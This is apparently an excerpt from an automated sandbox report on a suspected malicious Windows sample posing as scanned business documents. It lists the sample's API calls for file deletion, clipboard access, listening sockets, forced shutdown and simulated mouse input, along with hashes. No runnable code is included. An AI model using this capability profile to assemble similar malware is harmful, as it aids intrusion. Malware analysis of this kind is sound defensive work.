                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                      • String ID:
                                                      • API String ID: 420908878-0
                                                      • Opcode ID: 7f09b5db3193e795178c4b0ff1a2648b88d945e8fd6a157f6ed364a02d04d276
                                                      • Instruction ID: 65c0dc1c010be3864566265474033bd07e090f329bd3ac72dc7a49cd6c1b1ca9
                                                      • Opcode Fuzzy Hash: 7f09b5db3193e795178c4b0ff1a2648b88d945e8fd6a157f6ed364a02d04d276
                                                      • Instruction Fuzzy Hash: 5061F1342243069FD702EF24C894F7AB7A8AF88744F099469F546972B2CB31DD56CB62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002F69BE
                                                      • FindClose.KERNEL32(00000000), ref: 002F6A12
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002F6A4E
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002F6A75
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 002F6AB2
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 002F6ADF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                      • API String ID: 3830820486-3289030164
                                                      • Opcode ID: 877e646be721c84fed658d0eca3a6c230e835d2f6d1df914775d3014a6d55b73
                                                      • Instruction ID: 5bd927b0ae1a47fc5d556a47e21ed2311610b2058a39425e34cfecd2fa236369
                                                      • Opcode Fuzzy Hash: 877e646be721c84fed658d0eca3a6c230e835d2f6d1df914775d3014a6d55b73
                                                      • Instruction Fuzzy Hash: F4D17EB6518300AFC710EFA0C896EBBB7ECAF98704F04491DF685D6191EB74DA54CB62
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002F9663
                                                      • GetFileAttributesW.KERNEL32(?), ref: 002F96A1
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 002F96BB
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 002F96D3
                                                      • FindClose.KERNEL32(00000000), ref: 002F96DE
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 002F96FA
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 002F974A
                                                      • SetCurrentDirectoryW.KERNEL32(00346B7C), ref: 002F9768
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 002F9772
                                                      • FindClose.KERNEL32(00000000), ref: 002F977F
                                                      • FindClose.KERNEL32(00000000), ref: 002F978F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1409584000-438819550
                                                      • Opcode ID: 367f17ec5dc015b5edcb26a5c41fc23268fa3817b78478a9066cd33b1e2b603e
                                                      • Instruction ID: 57014b077431b1a204682e008c18cfcc298b3c6982ad54b1f33e8d6abb52eadd
                                                      • Opcode Fuzzy Hash: 367f17ec5dc015b5edcb26a5c41fc23268fa3817b78478a9066cd33b1e2b603e
                                                      • Instruction Fuzzy Hash: 2331F37256021E6FCF15AFB4DC09BEEB7AC9F09361F108465FA15E21A0DB74DDA08E10
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 002F97BE
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 002F9819
                                                      • FindClose.KERNEL32(00000000), ref: 002F9824
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 002F9840
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 002F9890
                                                      • SetCurrentDirectoryW.KERNEL32(00346B7C), ref: 002F98AE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 002F98B8
                                                      • FindClose.KERNEL32(00000000), ref: 002F98C5
                                                      • FindClose.KERNEL32(00000000), ref: 002F98D5
                                                        • Part of subcall function 002EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002EDB00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 2640511053-438819550
                                                      • Opcode ID: d7a804547303665b34b26ef9e80fef6d0abe0a966dc27891a9684f775a7b061f
                                                      • Instruction ID: 568cd8216131da1b3fadb1df913893ca5cba020ba07f327b45fedd34a50efabe
                                                      • Opcode Fuzzy Hash: d7a804547303665b34b26ef9e80fef6d0abe0a966dc27891a9684f775a7b061f
                                                      • Instruction Fuzzy Hash: 3A31E53156021E6BDF11AFB4DC49BEEB7AC9F0A3A0F108565F910A2190DB70DDE5CE60
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 002F8257
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 002F8267
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002F8273
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002F8310
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 002F8324
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 002F8356
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 002F838C
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 002F8395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                      • String ID: *.*
                                                      • API String ID: 1464919966-438819550
                                                      • Opcode ID: 6247f0d3fabe6aada737deaa4afa8c71f664ef1cd7b0453acb20b831e671f02f
                                                      • Instruction ID: 2af44eac750078bf63517f88ea6a4e90af3b5699c7e863fef82c096fc71d7ba8
                                                      • Opcode Fuzzy Hash: 6247f0d3fabe6aada737deaa4afa8c71f664ef1cd7b0453acb20b831e671f02f
                                                      • Instruction Fuzzy Hash: A5617B765243499FCB10EF20C8409AEF3E8BF89350F04892DF98987251DB35E965CF92
                                                      APIs
                                                        • Part of subcall function 00283AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00283A97,?,?,00282E7F,?,?,?,00000000), ref: 00283AC2
                                                        • Part of subcall function 002EE199: GetFileAttributesW.KERNEL32(?,002ECF95), ref: 002EE19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002ED122
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 002ED1DD
                                                      • MoveFileW.KERNEL32(?,?), ref: 002ED1F0
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 002ED20D
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 002ED237
                                                        • Part of subcall function 002ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,002ED21C,?,?), ref: 002ED2B2
                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 002ED253
                                                      • FindClose.KERNEL32(00000000), ref: 002ED264
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 1946585618-1173974218
                                                      • Opcode ID: 131cbb8eed13b54b539bfc738c0261d0bb058eb1323626751768daa9bfcc32b7
                                                      • Instruction ID: 4cfabbc6233a9a85c42f4f2a5abe6d3a69204bbafe3ddb913771223f31507ab6
                                                      • Opcode Fuzzy Hash: 131cbb8eed13b54b539bfc738c0261d0bb058eb1323626751768daa9bfcc32b7
                                                      • Instruction Fuzzy Hash: E2618B3586218E9BCF05EBE1CA529FDB779AF15300F644065E80177192EB316F69CF60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: c6449ef0116cb54273e46f0ce1564a31c8268be3f3459953d38d4f094a3688ee
                                                      • Instruction ID: b8db70e3333c0a9901d631f49029f387ac027f95324869532cfe7343fdb56661
                                                      • Opcode Fuzzy Hash: c6449ef0116cb54273e46f0ce1564a31c8268be3f3459953d38d4f094a3688ee
                                                      • Instruction Fuzzy Hash: 4441F434224211AFEB12DF15E848F69BBE8FF48368F15C0A9E5158BA72C775EC51CB90
                                                      APIs
                                                        • Part of subcall function 002E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002E170D
                                                        • Part of subcall function 002E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002E173A
                                                        • Part of subcall function 002E16C3: GetLastError.KERNEL32 ref: 002E174A
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 002EE932
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $ $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-3163812486
                                                      • Opcode ID: 81587156f931dca1f38aaf717ec19389ab500d552ac515efb2bdc1ffbe6b519a
                                                      • Instruction ID: 48fb94757b65e186b3539ed52f6c1b7c766f04c87a93850431c9bcf5597f2729
                                                      • Opcode Fuzzy Hash: 81587156f931dca1f38aaf717ec19389ab500d552ac515efb2bdc1ffbe6b519a
                                                      • Instruction Fuzzy Hash: CB012B726B0252ABEF1466B69C86FFB72DC9708740F564421FC02E71D3E6A09C6485A0
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00301276
                                                      • WSAGetLastError.WSOCK32 ref: 00301283
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 003012BA
                                                      • WSAGetLastError.WSOCK32 ref: 003012C5
                                                      • closesocket.WSOCK32(00000000), ref: 003012F4
                                                      • listen.WSOCK32(00000000,00000005), ref: 00301303
                                                      • WSAGetLastError.WSOCK32 ref: 0030130D
                                                      • closesocket.WSOCK32(00000000), ref: 0030133C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                      • String ID:
                                                      • API String ID: 540024437-0
                                                      • Opcode ID: 9c051db06c40a08a81aec14532bb3c146a1dff7735d1b32e78106f0b1fb0b172
                                                      • Instruction ID: 26b2658a2ecf8f8dcdf934eaea3f87809504684f26ed991fb1ded377030708ac
                                                      • Opcode Fuzzy Hash: 9c051db06c40a08a81aec14532bb3c146a1dff7735d1b32e78106f0b1fb0b172
                                                      • Instruction Fuzzy Hash: 924191356011009FD711DF68C4D8B6ABBE9BF4A318F198598E8568F2D6C771EC81CBE1
                                                      APIs
                                                        • Part of subcall function 00283AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00283A97,?,?,00282E7F,?,?,?,00000000), ref: 00283AC2
                                                        • Part of subcall function 002EE199: GetFileAttributesW.KERNEL32(?,002ECF95), ref: 002EE19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 002ED420
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 002ED470
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 002ED481
                                                      • FindClose.KERNEL32(00000000), ref: 002ED498
                                                      • FindClose.KERNEL32(00000000), ref: 002ED4A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: c2cc1dc8710e1b25e76a5e2b7c094aa8127bcd455a0a596a66e4f2f2bb9fcf15
                                                      • Instruction ID: 2171147fb5794772c2d701ad685208b2f05013cab5fdb8272f14d170fa34a800
                                                      • Opcode Fuzzy Hash: c2cc1dc8710e1b25e76a5e2b7c094aa8127bcd455a0a596a66e4f2f2bb9fcf15
                                                      • Instruction Fuzzy Hash: E8317E350693859BC705FF64D8918AFB7A8AEA5300F844E1DF4D1921D1EB30AA29CB63
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: a86cb3f9b11c659dffd8a300eaafd66be8033d07087d3f36868239aa2c97e41f
                                                      • Instruction ID: 8ee9f7fa905e0e3999d132048750794df10976ad54608bd6d528e09695221345
                                                      • Opcode Fuzzy Hash: a86cb3f9b11c659dffd8a300eaafd66be8033d07087d3f36868239aa2c97e41f
                                                      • Instruction Fuzzy Hash: AFC27B71E286298FDF65CE28CD407EAB7B9EB48344F1541EAD80DE7241E774AE918F40
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 002F64DC
                                                      • CoInitialize.OLE32(00000000), ref: 002F6639
                                                      • CoCreateInstance.OLE32(0031FCF8,00000000,00000001,0031FB68,?), ref: 002F6650
                                                      • CoUninitialize.OLE32 ref: 002F68D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: c5ebbbd117b9fdbe2c285276290a7f96cc71dc121304276af0f9b5ae41514cd4
                                                      • Instruction ID: b518c051cd3de7703a8afb399fe00d471df8ca0c8cd82d08008103bc27cefa06
                                                      • Opcode Fuzzy Hash: c5ebbbd117b9fdbe2c285276290a7f96cc71dc121304276af0f9b5ae41514cd4
                                                      • Instruction Fuzzy Hash: D6D18B71518301AFD304EF24C88596BB7E8FF98344F50492DF5959B2A1EB30ED59CBA2
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 003022E8
                                                        • Part of subcall function 002FE4EC: GetWindowRect.USER32(?,?), ref: 002FE504
                                                      • GetDesktopWindow.USER32 ref: 00302312
                                                      • GetWindowRect.USER32(00000000), ref: 00302319
                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00302355
                                                      • GetCursorPos.USER32(?), ref: 00302381
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003023DF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                      • String ID:
                                                      • API String ID: 2387181109-0
                                                      • Opcode ID: 7f0f656cd542cf7bb4e14794f2cc2f3ce22a7ac1b3e8180031aa38bb427982c3
                                                      • Instruction ID: c78baca2639288e07f19ee68a9d39a654240df4636df1883d35f7ecf84469133
                                                      • Opcode Fuzzy Hash: 7f0f656cd542cf7bb4e14794f2cc2f3ce22a7ac1b3e8180031aa38bb427982c3
                                                      • Instruction Fuzzy Hash: 8631EE72545315AFCB22DF15C849B9BBBEEFF88310F005A19F98597191DB34EA08CB92
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 002F9B78
                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 002F9C8B
                                                        • Part of subcall function 002F3874: GetInputState.USER32 ref: 002F38CB
                                                        • Part of subcall function 002F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F3966
                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 002F9BA8
                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 002F9C75
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                      • String ID: *.*
                                                      • API String ID: 1972594611-438819550
                                                      • Opcode ID: 9d603fe8fcb4d07372d8af1d1d95b217490a14da2d308ca8972359584e11de0c
                                                      • Instruction ID: d92ee73d6ef120bf9b4e2fcdcc60b683e95246e7fd8f9674341677d14bcd847f
                                                      • Opcode Fuzzy Hash: 9d603fe8fcb4d07372d8af1d1d95b217490a14da2d308ca8972359584e11de0c
                                                      • Instruction Fuzzy Hash: 0241817196120E9FDF15EF64C845BFEBBB8EF09350F144066E905A2191EB309EA5CF60
                                                      APIs
                                                        • Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00299A4E
                                                      • GetSysColor.USER32(0000000F), ref: 00299B23
                                                      • SetBkColor.GDI32(?,00000000), ref: 00299B36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Color$LongProcWindow
                                                      • String ID:
                                                      • API String ID: 3131106179-0
                                                      • Opcode ID: e8eac789b54caa9f9636b8144910bc3d341d18ce66ae23a292a9e660958946b5
                                                      • Instruction ID: 0bd32a59ef20589d58147e3a5c61df9aff5d81360668709f062ae561a1cee1b5
                                                      • Opcode Fuzzy Hash: e8eac789b54caa9f9636b8144910bc3d341d18ce66ae23a292a9e660958946b5
                                                      • Instruction Fuzzy Hash: 9EA12970138505BFEF299E3C8C98FBB269DDB46320F14410EF402CA6A1DA69DDB1C272
                                                      APIs
                                                        • Part of subcall function 0030304E: inet_addr.WSOCK32(?), ref: 0030307A
                                                        • Part of subcall function 0030304E: _wcslen.LIBCMT ref: 0030309B
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 0030185D
                                                      • WSAGetLastError.WSOCK32 ref: 00301884
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 003018DB
                                                      • WSAGetLastError.WSOCK32 ref: 003018E6
                                                      • closesocket.WSOCK32(00000000), ref: 00301915
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                       • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmp
